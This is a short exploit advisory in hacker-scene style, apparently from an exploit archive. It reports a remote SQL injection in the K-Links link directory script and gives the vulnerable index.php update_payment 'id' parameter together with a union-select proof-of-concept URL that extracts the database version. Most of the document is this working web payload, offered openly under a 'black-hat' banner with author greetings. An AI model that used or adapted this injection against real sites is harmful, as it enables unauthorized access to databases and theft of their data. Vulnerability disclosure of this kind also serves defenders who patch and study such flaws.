ExploitFixes
K-Links - Link Directory Script 2011-04-11 13:15:13

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: http://turn-k.net
[+] Software: K-Links
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: N0W... !AM W0RK!NG AL0NE
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: ll.4Pr.2oll
[?] T!ME: 05:15 am GMT
[?] Home: .........
[^]

[?]
======================================================================================
#suFFEr Fr0M REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================

[*] Err0r C0N50L3:


http://www.site.com/index.php?req=update_payment&id= EV!L INJECT!ON



[*] prove of concept =

http://www.site.com/index.php?req=update_payment&id=-4410+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--



Already Tested on Win Xp

[~]-----------------------------{((BLACk-hAT))}------------------------------------------------
# ;
# ;
[~] Greetz tO: .................................................................... no one deserved ;
#
[~]70 ALL ARAB!AN HACKER 3X3PT : .......................................LAM3RZ # ;
#
[~] spechial thanks :...................................... no one deserved # ;
#
[?]spechial SupP0RT : ................MY M!ND # � ;
#
[?]---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND: ........................................no one deserved #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------